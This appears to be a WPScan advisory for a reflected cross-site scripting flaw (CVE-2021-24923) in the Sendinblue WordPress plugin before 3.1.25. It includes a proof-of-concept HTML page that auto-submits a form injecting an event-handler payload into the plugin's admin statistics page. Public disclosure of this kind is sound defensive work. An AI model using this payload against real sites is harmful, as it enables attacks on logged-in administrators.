WordPress Plugin Vulnerabilities

Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue < 3.1.25 - Reflected XSS

Description

The plugin does not escape the sib-statistics-date parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting issue

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=sib_page_statistics" id="hack" method="POST">
      <input type="hidden" name="sib-statistics-date" value='2021 - 2021 - " onmouseover=alert(/XSS/) style=width:100%;height:3000px test="' />
      <input type="submit" value="Submit request" />
    </form>
  </body>

  <script>
    var form1 = document.getElementById('hack');
    form1.submit();
</script>
</html>

Affects Plugins

Plugin icon
mailin
Fixed in 3.1.25

References

CVE
CVE-2021-24923

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
7.5 (high)

Miscellaneous

Original Researcher
ZhongFu Su(JrXnm) of Wuhan University
Submitter
ZhongFu Su(JrXnm) of Wuhan University
Submitter website
https://blog.szfszf.top
Submitter twitter
JrXnm
Verified
Yes
WPVDB ID
3afef591-9e00-4af8-a8a6-e04ec5e61795

Timeline

Publicly Published
2021-12-23 (about 2 years ago)
Added
2021-12-23 (about 2 years ago)
Last Updated
2022-09-26 (about 1 years ago)

Other

Published
Title
Published
2023-11-24
Title
Yoast SEO < 21.1 - Authenticated (Seo Manager+) Stored Cross-Site Scripting
Published
2023-10-17
Title
Seriously Simple Stats < 1.5.2 - Reflected XSS
Published
2024-03-29
Title
Ultimate Addons for Beaver Builder – Lite < 1.5.8 - Authenticated (Contributor+) Stored Cross-Site Scripting via Button Widget
Published
2023-11-13
Title
Premmerce Redirect Manager < 1.0.12 - Admin+ Stored XSS
Published
2023-10-02
Title
Email posts to subscribers <= 6.2 - Admin+ Stored XSS